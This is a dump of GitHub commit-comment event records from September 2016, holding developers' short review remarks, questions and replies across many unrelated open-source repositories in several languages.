{"id":"4614970966","type":"CommitCommentEvent","actor":{"login":"MikaMouseMan"},"repo":{"name":"MikaMouseMan/king"},"payload":{"comment":{"id":19165520,"position":null,"line":null,"path":null,"commit_id":"c0311f26028051028f96de0785be08809f1e1eac","created_at":"2016-09-25T21:28:50Z","updated_at":"2016-09-25T21:28:50Z","body":"Изменен текст"}},"created_at":"2016-09-25T21:28:50Z"}
{"id":"4614971820","type":"CommitCommentEvent","actor":{"login":"MikaMouseMan"},"repo":{"name":"MikaMouseMan/king"},"payload":{"comment":{"id":19165522,"position":null,"line":null,"path":null,"commit_id":"6d0b7c0932b37d0f6dcc96c0a87a55ace05cb7e3","created_at":"2016-09-25T21:29:25Z","updated_at":"2016-09-25T21:29:25Z","body":"Создан новый документ"}},"created_at":"2016-09-25T21:29:25Z"}
{"id":"4614973318","type":"CommitCommentEvent","actor":{"login":"MarkBennett"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165523,"position":20,"line":17,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:30:18Z","updated_at":"2016-09-25T21:30:18Z","body":"That's what we've done in the past, but I see your point. Are you hoping to archive copies of the talks in this repo?"}},"created_at":"2016-09-25T21:30:18Z"}
{"id":"4614974153","type":"CommitCommentEvent","actor":{"login":"zvonicek"},"repo":{"name":"zvonicek/MVVMTestProject"},"payload":{"comment":{"id":19165524,"position":22,"line":22,"path":"testMVVM/Coordinator.swift","commit_id":"0133a6dbe12cc0a04674def2aba8888b21d981c5","created_at":"2016-09-25T21:30:48Z","updated_at":"2016-09-25T21:30:48Z","body":"Another thing I've considered is having this coordinator generic. But again, this was not possible as you cannot do extensions on generic NSObject subclasses :-( "}},"created_at":"2016-09-25T21:30:48Z"}
{"id":"4614974338","type":"CommitCommentEvent","actor":{"login":"JaredNinja"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19165525,"position":null,"line":null,"path":null,"commit_id":"e22c800edd1100582238b4c505c0d2a262c0b8c7","created_at":"2016-09-25T21:30:55Z","updated_at":"2016-09-25T21:30:55Z","body":"@DDuarte Thank you. Will do."}},"created_at":"2016-09-25T21:30:55Z"}
{"id":"4614976237","type":"CommitCommentEvent","actor":{"login":"LandDragoon"},"repo":{"name":"SACompanion/translations"},"payload":{"comment":{"id":19165527,"position":null,"line":null,"path":null,"commit_id":"93ba22ee93d89131acfcc57164ee56cdb3eef7c4","created_at":"2016-09-25T21:32:10Z","updated_at":"2016-09-25T21:32:10Z","body":"Your changes are available on your branch (here: https://github.com/GiovanniCDA/translations/blob/patch-1/translations_pt.txt) as GitHub makes a copy of the file when you edit it. Please try making a pull request (https://github.com/SACompanion/translations/pulls) so the changes will be added to the main version of the file. If you can't get this to work, let me know and I'll add your changes manually :)"}},"created_at":"2016-09-25T21:32:10Z"}
{"id":"4614978113","type":"CommitCommentEvent","actor":{"login":"nixel2007"},"repo":{"name":"xDrivenDevelopment/atom-language-1c-bsl"},"payload":{"comment":{"id":19165530,"position":null,"line":null,"path":null,"commit_id":"5c15a098c36589d253199eb2508aaf9f554176d5","created_at":"2016-09-25T21:33:21Z","updated_at":"2016-09-25T21:33:21Z","body":"https://github.com/xDrivenDevelopment/1c-syntax/issues/198"}},"created_at":"2016-09-25T21:33:21Z"}
{"id":"4614979390","type":"CommitCommentEvent","actor":{"login":"FloFreak"},"repo":{"name":"FloFreak/FloFreak.github.io"},"payload":{"comment":{"id":19165531,"position":null,"line":null,"path":null,"commit_id":"8637c17bc224abe1b0057922a348a7efffecc5bd","created_at":"2016-09-25T21:34:18Z","updated_at":"2016-09-25T21:34:18Z","body":"Neue Seite"}},"created_at":"2016-09-25T21:34:18Z"}
{"id":"4614980149","type":"CommitCommentEvent","actor":{"login":"mwhudson"},"repo":{"name":"CanonicalLtd/subiquity"},"payload":{"comment":{"id":19165534,"position":5,"line":674,"path":"subiquitycore/models/network.py","commit_id":"ba51edff75cd60641d9796ada5c4187c58b9f6fb","created_at":"2016-09-25T21:34:47Z","updated_at":"2016-09-25T21:34:47Z","body":"This is kind of the opposite way to excluding an interface that I took in 36967e23096701f00dbe42880d239e03dcf4e395, it would probably be better to be consistent..."}},"created_at":"2016-09-25T21:34:47Z"}
{"id":"4614981303","type":"CommitCommentEvent","actor":{"login":"RyanJGray"},"repo":{"name":"RyanJGray/Backdoor_Busting_2015"},"payload":{"comment":{"id":19165538,"position":null,"line":null,"path":null,"commit_id":"ac0fb08485a7451f648bb419077d91721553b5d2","created_at":"2016-09-25T21:35:39Z","updated_at":"2016-09-25T21:35:39Z","body":"Lol"}},"created_at":"2016-09-25T21:35:39Z"}
{"id":"4614984218","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19165545,"position":6,"line":4,"path":"project/plugins.sbt","commit_id":"9d2344c387f6404813acf0f986d4146edacbcde2","created_at":"2016-09-25T21:37:36Z","updated_at":"2016-09-25T21:37:36Z","body":"test comment\r\n"}},"created_at":"2016-09-25T21:37:36Z"}
{"id":"4614984344","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19165546,"position":6,"line":4,"path":"project/plugins.sbt","commit_id":"9d2344c387f6404813acf0f986d4146edacbcde2","created_at":"2016-09-25T21:37:41Z","updated_at":"2016-09-25T21:37:41Z","body":"test reply"}},"created_at":"2016-09-25T21:37:41Z"}
{"id":"4614987065","type":"CommitCommentEvent","actor":{"login":"piotr-szachewicz"},"repo":{"name":"piotr-szachewicz/iir-filter-designer"},"payload":{"comment":{"id":19165550,"position":null,"line":null,"path":null,"commit_id":"06722c1089b8dd525fb44330afc6dfa33a0d1c62","created_at":"2016-09-25T21:39:45Z","updated_at":"2016-09-25T21:39:45Z","body":"what do you mean? Do you have problems running the code?"}},"created_at":"2016-09-25T21:39:45Z"}
{"id":"4614989214","type":"CommitCommentEvent","actor":{"login":"CAYdenberg"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165555,"position":20,"line":17,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:41:17Z","updated_at":"2016-09-25T21:41:17Z","body":"Yeah ... but I'd rather do other things like community showcase first. I see your point. Collecting and archiving everything would be a big PITA for someone, too."}},"created_at":"2016-09-25T21:41:17Z"}
{"id":"4614990318","type":"CommitCommentEvent","actor":{"login":"Apollon77"},"repo":{"name":"ioBroker/ioBroker.influxdb"},"payload":{"comment":{"id":19165558,"position":null,"line":null,"path":null,"commit_id":"9ca96227d6fb5bb50a04f3c8836ac999b70fa1ec","created_at":"2016-09-25T21:42:07Z","updated_at":"2016-09-25T21:42:07Z","body":"sorry, hab übersehen das die genutzt wurde ... hat aber auch ohne funktioniert in meinen Tests ... hm :-("}},"created_at":"2016-09-25T21:42:07Z"}
{"id":"4614990464","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19165560,"position":null,"line":null,"path":null,"commit_id":"013940250bd8aaa4beee90f418d7a4673981efbd","created_at":"2016-09-25T21:42:10Z","updated_at":"2016-09-25T21:42:10Z","body":"Yeah  okay okay I'll look into this sometime this week :p "}},"created_at":"2016-09-25T21:42:10Z"}
{"id":"4614991484","type":"CommitCommentEvent","actor":{"login":"Zayelion"},"repo":{"name":"Buttys/Dev_ygopro"},"payload":{"comment":{"id":19165563,"position":null,"line":null,"path":null,"commit_id":"98663521d53ec61ebf877b83dff712875c6e8d80","created_at":"2016-09-25T21:42:56Z","updated_at":"2016-09-25T21:42:56Z","body":"Thats not terribly realistic given the mechanism for server communication."}},"created_at":"2016-09-25T21:42:56Z"}
{"id":"4614993307","type":"CommitCommentEvent","actor":{"login":"vatbub"},"repo":{"name":"vatbub/hangman-solver"},"payload":{"comment":{"id":19165564,"position":null,"line":null,"path":null,"commit_id":"415ee46cac745bf481c944bddae4c3088ed200fd","created_at":"2016-09-25T21:44:10Z","updated_at":"2016-09-25T21:44:10Z","body":"Oh, sry, meant #5, not #8 "}},"created_at":"2016-09-25T21:44:10Z"}
{"id":"4614993632","type":"CommitCommentEvent","actor":{"login":"FloFreak"},"repo":{"name":"FloFreak/FloFreak.gibhub.io"},"payload":{"comment":{"id":19165566,"position":null,"line":null,"path":null,"commit_id":"d9fb1c6ecbfd95b038353697b7fd17cfccaa32e3","created_at":"2016-09-25T21:44:23Z","updated_at":"2016-09-25T21:44:23Z","body":"v"}},"created_at":"2016-09-25T21:44:23Z"}
{"id":"4614993656","type":"CommitCommentEvent","actor":{"login":"PuddletownDesign"},"repo":{"name":"PuddletownDesign/russ"},"payload":{"comment":{"id":19165567,"position":null,"line":null,"path":null,"commit_id":"e898bb362fd5694709f9cfa182f7f8b5de35eedf","created_at":"2016-09-25T21:44:23Z","updated_at":"2016-09-25T21:44:23Z","body":"#List of corrections\r\n\r\n1. Don't wrap lists with headers. the headers should be above the list\r\n2. Wrap paragraphs of text with the p (paragraph) tag\r\n3. p for a paragraph inside block quote. Cite inside blockquote\r\n4. Indent nested block level tags (i'll explain blocks and inline later)\r\n\r\n*sorry i wasn't more clear about using headers...*"}},"created_at":"2016-09-25T21:44:23Z"}
{"id":"4614993683","type":"CommitCommentEvent","actor":{"login":"xylographe"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19165568,"position":17,"line":17,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T21:44:25Z","updated_at":"2016-09-25T21:44:25Z","body":"@aaaxx Leading and trailing white space is already trimmed : `string line = lines[i].Trim();` (line 62).\r\n\r\n"}},"created_at":"2016-09-25T21:44:25Z"}
{"id":"4614994059","type":"CommitCommentEvent","actor":{"login":"MarkBennett"},"repo":{"name":"ExchangeJS/speakers"},"payload":{"comment":{"id":19165569,"position":20,"line":17,"path":"README.md","commit_id":"ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da","created_at":"2016-09-25T21:44:39Z","updated_at":"2016-09-25T21:44:39Z","body":"Why don't we hold onto the idea of archives and at least start collecting\ncopies of everything. Then we can have them ready when we start building\nthe showcase.\n\nWe're also going to be streaming everything to YouTube which will supply an\narchive of the talks themselves, so there will always be that.\n\nOn Sun, Sep 25, 2016, 15:41 Casey Ydenberg <notifications@github.com> wrote:\n\n> Yeah ... but I'd rather do other things like community showcase first. I\n> see your point. Collecting and archiving everything would be a big PITA for\n> someone, too.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ExchangeJS/speakers/commit/ad1bcfee11b52ddfe7f2344da2cc51c0b943d5da#commitcomment-19165555>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADxsJMrOPc--SzFlbTsfcby49mvukZxks5qtup9gaJpZM4KGAT->\n> .\n>\n"}},"created_at":"2016-09-25T21:44:39Z"}
{"id":"4614997240","type":"CommitCommentEvent","actor":{"login":"scottleibrand"},"repo":{"name":"openaps/oref0"},"payload":{"comment":{"id":19165572,"position":null,"line":null,"path":null,"commit_id":"3f4c205cb5e88c59d229994cfe9c52e1871cf5da","created_at":"2016-09-25T21:46:51Z","updated_at":"2016-09-25T21:46:51Z","body":"Not sure when we get -0400 and when it'd be -04:00, but making the : optional seems safe, as either way we'll only match when there's a + or -, which indicates timezone either way."}},"created_at":"2016-09-25T21:46:51Z"}
{"id":"4614998060","type":"CommitCommentEvent","actor":{"login":"simias"},"repo":{"name":"iCatButler/beetle-psx-libretro"},"payload":{"comment":{"id":19165575,"position":36,"line":1170,"path":"mednafen/psx/gte.cpp","commit_id":"e9d2688c741943177d824959f20092372c8882d0","created_at":"2016-09-25T21:47:30Z","updated_at":"2016-09-25T21:47:30Z","body":"Is this `max` really necessary? I believe that the test in done in the `Divide` implementation.\r\n\r\nAt any rate I'm going to revert it in my branch, if this is necessary for the PGXP code I think there should be a condition here to make sure the GTE behaves accurately when PGXP is disabled (mednafen's implementation of the GTE is bit-accurate as far as I know)."}},"created_at":"2016-09-25T21:47:30Z"}
{"id":"4614999983","type":"CommitCommentEvent","actor":{"login":"wojtex"},"repo":{"name":"qedsoftware/crashup"},"payload":{"comment":{"id":19165577,"position":null,"line":null,"path":null,"commit_id":"6ebb2d8a270d67ecfb38fbf0913dd353371325da","created_at":"2016-09-25T21:48:52Z","updated_at":"2016-09-25T21:48:52Z","body":"Not in v0.15.32."}},"created_at":"2016-09-25T21:48:52Z"}
{"id":"4615000625","type":"CommitCommentEvent","actor":{"login":"wojtex"},"repo":{"name":"qedsoftware/crashup"},"payload":{"comment":{"id":19165578,"position":24,"line":45,"path":"USAGE.md","commit_id":"6ebb2d8a270d67ecfb38fbf0913dd353371325da","created_at":"2016-09-25T21:49:22Z","updated_at":"2016-09-25T21:49:22Z","body":"Not in v0.15.32."}},"created_at":"2016-09-25T21:49:22Z"}
{"id":"4615001316","type":"CommitCommentEvent","actor":{"login":"scottleibrand"},"repo":{"name":"openaps/oref0"},"payload":{"comment":{"id":19165584,"position":null,"line":null,"path":null,"commit_id":"3f4c205cb5e88c59d229994cfe9c52e1871cf5da","created_at":"2016-09-25T21:49:55Z","updated_at":"2016-09-25T21:49:55Z","body":"@elnjensen Just added https://github.com/openaps/oref0/pull/219/commits/a7863690c07320ea738f83922768e829c296d12e - can you confirm that fixes it?"}},"created_at":"2016-09-25T21:49:55Z"}
{"id":"4615001623","type":"CommitCommentEvent","actor":{"login":"mrkongo"},"repo":{"name":"dfreeman/ember-cli-notifications"},"payload":{"comment":{"id":19165585,"position":null,"line":null,"path":null,"commit_id":"a28b658dd897f4ba9fc2eac1c68a7b78cbd1dc9e","created_at":"2016-09-25T21:50:07Z","updated_at":"2016-09-25T21:50:07Z","body":"It doesn't work, doesn't solve the problem on Windows. Same problem."}},"created_at":"2016-09-25T21:50:07Z"}
{"id":"4615004513","type":"CommitCommentEvent","actor":{"login":"santita"},"repo":{"name":"santita/chairtemplate"},"payload":{"comment":{"id":19165595,"position":null,"line":null,"path":null,"commit_id":"3674713cb90a2f240b6d90c2c9a98591f1e721c6","created_at":"2016-09-25T21:52:14Z","updated_at":"2016-09-25T21:52:14Z","body":"jeszcze nie skończone - brak ikon social w stopce, brak formatowania textu w sliderze "}},"created_at":"2016-09-25T21:52:14Z"}
{"id":"4615007536","type":"CommitCommentEvent","actor":{"login":"jimmyej"},"repo":{"name":"jimmyej/MICROSERVICES"},"payload":{"comment":{"id":19165599,"position":null,"line":null,"path":null,"commit_id":"52c77032f0644aad85df6fb5ed19dcdf31e21167","created_at":"2016-09-25T21:54:18Z","updated_at":"2016-09-25T21:54:18Z","body":"xxxxxx"}},"created_at":"2016-09-25T21:54:18Z"}
{"id":"4615011120","type":"CommitCommentEvent","actor":{"login":"USA-RedDragon"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":19165603,"position":null,"line":null,"path":null,"commit_id":"87ce9703082c2853dda22f63873361bc5a57ea90","created_at":"2016-09-25T21:56:48Z","updated_at":"2016-09-25T21:56:48Z","body":"Damn dude. Where'd you learn so much about the Bluetooth specification?"}},"created_at":"2016-09-25T21:56:48Z"}
{"id":"4615011422","type":"CommitCommentEvent","actor":{"login":"USA-RedDragon"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":19165604,"position":null,"line":null,"path":null,"commit_id":"87ce9703082c2853dda22f63873361bc5a57ea90","created_at":"2016-09-25T21:57:02Z","updated_at":"2016-09-25T21:57:02Z","body":"Surely this isn't a kang"}},"created_at":"2016-09-25T21:57:02Z"}
{"id":"4615011596","type":"CommitCommentEvent","actor":{"login":"AlfieC"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19165605,"position":null,"line":null,"path":null,"commit_id":"dea2d41b86e2a749251e12dd33439a08e9622dba","created_at":"2016-09-25T21:57:08Z","updated_at":"2016-09-25T21:57:08Z","body":"Been reading through old commits - could this not be sped-up by using `Chunk chunk = getChunkIfLoaded(blockposition.getX() >> 4, blockposition.getZ() >> 4);` and then throwing a `if (chunk == null) return 0;`? Would stop double map lookups. "}},"created_at":"2016-09-25T21:57:08Z"}
{"id":"4615011614","type":"CommitCommentEvent","actor":{"login":"FlatOutPS2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19165606,"position":null,"line":null,"path":null,"commit_id":"013940250bd8aaa4beee90f418d7a4673981efbd","created_at":"2016-09-25T21:57:09Z","updated_at":"2016-09-25T21:57:09Z","body":"That leaves you about one hour. :p"}},"created_at":"2016-09-25T21:57:09Z"}
{"id":"4615012397","type":"CommitCommentEvent","actor":{"login":"unemenuFito"},"repo":{"name":"unemenuFito/unemenuPC"},"payload":{"comment":{"id":19165609,"position":null,"line":null,"path":null,"commit_id":"f65d68a36cf07e7fa9585905212f30248c3337e9","created_at":"2016-09-25T21:57:44Z","updated_at":"2016-09-25T21:57:44Z","body":"Version inicial desde el browser"}},"created_at":"2016-09-25T21:57:44Z"}
{"id":"4615013830","type":"CommitCommentEvent","actor":{"login":"vladimirici"},"repo":{"name":"vladimirici/git_test"},"payload":{"comment":{"id":19165613,"position":1,"line":1,"path":"README.md","commit_id":"507f3aa1daa1f7cb75c1bf24c4422dcf9f9305c6","created_at":"2016-09-25T21:58:48Z","updated_at":"2016-09-25T21:58:48Z","body":"im trying"}},"created_at":"2016-09-25T21:58:48Z"}
{"id":"4615017732","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"shadowsocks/shadowsocks-windows"},"payload":{"comment":{"id":19165617,"position":null,"line":null,"path":null,"commit_id":"c671c7c32dc5604abf2f86145e875fd1f5b5dc35","created_at":"2016-09-25T22:01:00Z","updated_at":"2016-09-25T22:01:00Z","body":"后来去掉了，因为和双击事件冲突，如果有好办法可以加回来"}},"created_at":"2016-09-25T22:01:00Z"}
{"id":"4615021143","type":"CommitCommentEvent","actor":{"login":"Soulem"},"repo":{"name":"Trialdev/Trial"},"payload":{"comment":{"id":19165622,"position":null,"line":null,"path":null,"commit_id":"dc4c318d906354c9e46841717efa446d3ef85c72","created_at":"2016-09-25T22:03:18Z","updated_at":"2016-09-25T22:03:18Z","body":"Shame you cannot edit the post.  I forgot to add a TODO for the test image.\r\n\r\nTODO:: Rotate and animate test bullet image so that it is firing forward relative to it moving."}},"created_at":"2016-09-25T22:03:18Z"}
{"id":"4615025255","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"19smitgr/19smitgr.github.io"},"payload":{"comment":{"id":19165638,"position":null,"line":null,"path":null,"commit_id":"0938d2b2bc466877c39deac57cd4baaffcd67313","created_at":"2016-09-25T22:06:04Z","updated_at":"2016-09-25T22:06:04Z","body":"Just you Garrett...\r\nLOL"}},"created_at":"2016-09-25T22:06:04Z"}
{"id":"4615026093","type":"CommitCommentEvent","actor":{"login":"aaryllins"},"repo":{"name":"aaryllins/html-validation-fixes"},"payload":{"comment":{"id":19165644,"position":null,"line":null,"path":null,"commit_id":"98641fd3169f6bfdd72971879eebcb0cc84bff49","created_at":"2016-09-25T22:06:42Z","updated_at":"2016-09-25T22:06:42Z","body":"Great! Markbot was still giving me the error, but maybe it just needed time to register the update.\r\n\r\nThanks again! Everything submitted perfectly."}},"created_at":"2016-09-25T22:06:42Z"}
{"id":"4615028105","type":"CommitCommentEvent","actor":{"login":"GuillermoSnow"},"repo":{"name":"gonzalotoledo/proyectobd2"},"payload":{"comment":{"id":19165650,"position":null,"line":null,"path":null,"commit_id":"605d671315c3a1ce5eb09c76bebd5cc8821197b0","created_at":"2016-09-25T22:08:05Z","updated_at":"2016-09-25T22:08:05Z","body":"[LA EMPRESA-ESTRUCTURA ORGANIZACIONAL-1ER ENTREGABLE.docx](https://github.com/gonzalotoledo/proyectobd2/files/491924/LA.EMPRESA-ESTRUCTURA.ORGANIZACIONAL-1ER.ENTREGABLE.docx)\r\n"}},"created_at":"2016-09-25T22:08:05Z"}
{"id":"4615033360","type":"CommitCommentEvent","actor":{"login":"jeehyun100"},"repo":{"name":"bi-lab/deeplearning_tutorial"},"payload":{"comment":{"id":19165656,"position":null,"line":null,"path":null,"commit_id":"175b26c272e35c54aa1fab781cc2723e0b6d8642","created_at":"2016-09-25T22:11:40Z","updated_at":"2016-09-25T22:11:40Z","body":"안년하세요. 토요일날 강의들었던 학생입니다 ^^ rnn이 좀더 길었으면 했는데 오전에 환경 잡느라 늦어져서 많이 아쉬웠습니다. 위 코드중 궁금한 부분이 있는데 단어를 벡터로 바꾸는 word2vec을 글로브를 써서 바꾸셨다고 했는데 예제만 봐서는 영어를 묶어서 백터로 바꿔주는 것 같습니담.  혹씨 한국어를 벡터로 바꿔즈는것을 없는지 알고 싶습니다!! 회신주시면 감사하겠습니다"}},"created_at":"2016-09-25T22:11:40Z"}
{"id":"4615033728","type":"CommitCommentEvent","actor":{"login":"puzrin"},"repo":{"name":"chriso/redback"},"payload":{"comment":{"id":19165659,"position":5,"line":8,"path":"package.json","commit_id":"2b70cd62a0afab2df4530c0a50790edd6bef14ef","created_at":"2016-09-25T22:11:56Z","updated_at":"2016-09-25T22:11:56Z","body":"That's potentially dangerous. I'd suggest to clear keys by `prefix*` after tests or (in worst case) at least use non-zero redis db index (> 7) for test data"}},"created_at":"2016-09-25T22:11:56Z"}
{"id":"4615035457","type":"CommitCommentEvent","actor":{"login":"timholy"},"repo":{"name":"timholy/Images.jl"},"payload":{"comment":{"id":19165663,"position":null,"line":null,"path":null,"commit_id":"d36527fde6bed796bfe05692ad16f7a9292fc051","created_at":"2016-09-25T22:13:13Z","updated_at":"2016-09-25T22:13:13Z","body":"By \"intensity channel\" do you mean luminance = grayscale? (`Gray(rgb)` is identical to converting to the Y channel of `YIQ`.) Or did you mean \"the combined effect of all color channels,\" in which case this is indeed what we have here."}},"created_at":"2016-09-25T22:13:13Z"}
{"id":"4615035748","type":"CommitCommentEvent","actor":{"login":"jerryshaw12"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19165666,"position":null,"line":null,"path":null,"commit_id":"8715ccad23b1e2d9e258741138419a024a50a799","created_at":"2016-09-25T22:13:24Z","updated_at":"2016-09-25T22:13:24Z","body":"what is this? i didn't found any changes in experimental menu."}},"created_at":"2016-09-25T22:13:24Z"}
{"id":"4615038334","type":"CommitCommentEvent","actor":{"login":"zang1123"},"repo":{"name":"zang1123/Physicochemical-Property-Prediction"},"payload":{"comment":{"id":19165673,"position":1,"line":1,"path":"README.md","commit_id":"9b2e056c246a87fa0b77959990d32ca42e3ea36e","created_at":"2016-09-25T22:15:11Z","updated_at":"2016-09-25T22:15:11Z","body":"Models for predicting six physicochemical properties for environmental chemicals. The properties are: octonol-water partition coefficient (LogP), water solubility (LogS), melting point (MP), boiling point (BP), vapor pressure (LogVP), and bioconcentration factor (BCF)."}},"created_at":"2016-09-25T22:15:11Z"}
{"id":"4615039676","type":"CommitCommentEvent","actor":{"login":"chriso"},"repo":{"name":"chriso/redback"},"payload":{"comment":{"id":19165677,"position":5,"line":8,"path":"package.json","commit_id":"2b70cd62a0afab2df4530c0a50790edd6bef14ef","created_at":"2016-09-25T22:16:02Z","updated_at":"2016-09-25T22:16:02Z","body":"Agreed, just trying to get tests passing at the moment, and if you have a look at the old code you'll see that it was already calling `flushdb` in a `setTimeout`. I've added a note in the README to warn people."}},"created_at":"2016-09-25T22:16:02Z"}
{"id":"4615040065","type":"CommitCommentEvent","actor":{"login":"mattab"},"repo":{"name":"piwik/piwik"},"payload":{"comment":{"id":19165682,"position":null,"line":null,"path":null,"commit_id":"fb040fea0ac354ee4c009b590fef029243ef7268","created_at":"2016-09-25T22:16:19Z","updated_at":"2016-09-25T22:16:19Z","body":":+1: "}},"created_at":"2016-09-25T22:16:19Z"}
{"id":"4615041410","type":"CommitCommentEvent","actor":{"login":"aoindustries"},"repo":{"name":"aoindustries/tomcat70"},"payload":{"comment":{"id":19165693,"position":null,"line":null,"path":null,"commit_id":"8e33a0581da4908803538e7ddb94f3c24fd89b0c","created_at":"2016-09-25T22:17:12Z","updated_at":"2016-09-25T22:17:12Z","body":"Found another concurrency bottleneck in our usage.  TagHandlerPool is a source of lock contention as well as requiring tuning to ensure adequate pool sizes.  We have added a ConcurrentTagHandlerPool that neither causes contention nor requires tuning.\r\n\r\nWe tested one of our heavier pages with a concurrency of 20 on a 4-core/8-thread CPU.  Before this change, we were limited to 31.52 requests/second at around 560% CPU utilization (of 800% possible).  After this change 41.32 requests/second at 780% CPU utilization (system maxed).  We achieved a 31% increase in throughput with about 39% increase in CPU utilization."}},"created_at":"2016-09-25T22:17:12Z"}
{"id":"4615043142","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19165696,"position":null,"line":null,"path":null,"commit_id":"08a39260126da159c5a55e24d313e4562f2ad6f3","created_at":"2016-09-25T22:18:33Z","updated_at":"2016-09-25T22:18:33Z","body":"Figuring out PathFinder and how to use this code for real: [gist](https://gist.github.com/sethten/cfeae1a7b294ebe1327ba744d83a53f9)"}},"created_at":"2016-09-25T22:18:33Z"}
{"id":"4615043361","type":"CommitCommentEvent","actor":{"login":"Shalvah"},"repo":{"name":"src-unn/SRC-Website"},"payload":{"comment":{"id":19165697,"position":null,"line":null,"path":null,"commit_id":"9d2e4241a677105435d82f96350967fc112c348e","created_at":"2016-09-25T22:18:41Z","updated_at":"2016-09-25T22:18:41Z","body":"Should /idea be in the repo? @jcnwobodo"}},"created_at":"2016-09-25T22:18:41Z"}
{"id":"4615046258","type":"CommitCommentEvent","actor":{"login":"puzrin"},"repo":{"name":"chriso/redback"},"payload":{"comment":{"id":19165701,"position":5,"line":8,"path":"package.json","commit_id":"2b70cd62a0afab2df4530c0a50790edd6bef14ef","created_at":"2016-09-25T22:20:46Z","updated_at":"2016-09-25T22:20:46Z","body":"If you decide to fix, something like this can help:\r\n\r\n`redis-cli -n 8 flushdb` + `require('redis').createClient('redis://localhost/8')`\r\n\r\nor\r\n\r\nhttp://stackoverflow.com/questions/4006324/how-to-atomically-delete-keys-matching-a-pattern-using-redis"}},"created_at":"2016-09-25T22:20:46Z"}
{"id":"4615047658","type":"CommitCommentEvent","actor":{"login":"wasdennnoch"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19165704,"position":null,"line":null,"path":null,"commit_id":"8715ccad23b1e2d9e258741138419a024a50a799","created_at":"2016-09-25T22:21:45Z","updated_at":"2016-09-25T22:21:45Z","body":"Long click a notification and there is an extra button on MM."}},"created_at":"2016-09-25T22:21:45Z"}
{"id":"4615047933","type":"CommitCommentEvent","actor":{"login":"xylographe"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19165706,"position":17,"line":17,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T22:21:58Z","updated_at":"2016-09-25T22:21:58Z","body":"@ivandrofly Good point!\r\nExtra space between frame number and succeeding comma doesn't seem that essential anyway.\r\nBut it would be nice if `2447,2513,\"...\"` (no space between comma and succeeding frame number) could (safely) be accepted."}},"created_at":"2016-09-25T22:21:58Z"}
{"id":"4615048303","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19165707,"position":null,"line":null,"path":null,"commit_id":"a08c77f1b2c8b3bfbd17efede99daf6a02fc85d8","created_at":"2016-09-25T22:22:13Z","updated_at":"2016-09-25T22:22:13Z","body":"aww <3 even tho i did nothn"}},"created_at":"2016-09-25T22:22:13Z"}
{"id":"4615051328","type":"CommitCommentEvent","actor":{"login":"evolution2312"},"repo":{"name":"jeremyfa/yaml.js"},"payload":{"comment":{"id":19165710,"position":2,"line":2,"path":".gitignore","commit_id":"c6cbcf0326723c5f0013490d1fea489694790775","created_at":"2016-09-25T22:24:08Z","updated_at":"2016-09-25T22:24:08Z","body":"node_modules\r\n"}},"created_at":"2016-09-25T22:24:08Z"}
{"id":"4615052121","type":"CommitCommentEvent","actor":{"login":"SalmonGER"},"repo":{"name":"SalmonGER/SkinChanger"},"payload":{"comment":{"id":19165711,"position":null,"line":null,"path":null,"commit_id":"a08c77f1b2c8b3bfbd17efede99daf6a02fc85d8","created_at":"2016-09-25T22:24:40Z","updated_at":"2016-09-25T22:24:40Z","body":"@Aericio didn't you say you would create the English language file? <333"}},"created_at":"2016-09-25T22:24:40Z"}
{"id":"4615052610","type":"CommitCommentEvent","actor":{"login":"evolution2312"},"repo":{"name":"jeremyfa/yaml.js"},"payload":{"comment":{"id":19165714,"position":4,"line":2,"path":".gitignore","commit_id":"c6cbcf0326723c5f0013490d1fea489694790775","created_at":"2016-09-25T22:25:05Z","updated_at":"2016-09-25T22:25:05Z","body":"node_modules\r\n"}},"created_at":"2016-09-25T22:25:05Z"}
{"id":"4615053726","type":"CommitCommentEvent","actor":{"login":"evolution2312"},"repo":{"name":"jeremyfa/yaml.js"},"payload":{"comment":{"id":19165718,"position":2,"line":2,"path":".gitignore","commit_id":"c6cbcf0326723c5f0013490d1fea489694790775","created_at":"2016-09-25T22:25:49Z","updated_at":"2016-09-25T22:25:49Z","body":"node_modules"}},"created_at":"2016-09-25T22:25:49Z"}
